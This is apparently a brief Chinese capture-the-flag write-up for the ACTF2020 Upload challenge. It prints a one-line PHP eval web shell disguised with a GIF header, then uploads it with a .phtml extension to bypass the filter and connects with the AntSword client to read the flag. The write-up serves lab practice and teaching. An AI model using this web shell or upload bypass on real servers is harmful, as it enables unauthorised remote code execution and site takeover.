构造test.php(一句话木马),内容如下
GIF89a<script language="php">eval($_POST['shell']);</script>
抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称
再用中国蚁剑链接,查找目录
可得flag
标签:ACTF2020,phtml,Upload,buu,GIF89aeval,test,文件名称,上传
来源: https://blog.csdn.net/m0_53314778/article/details/117430603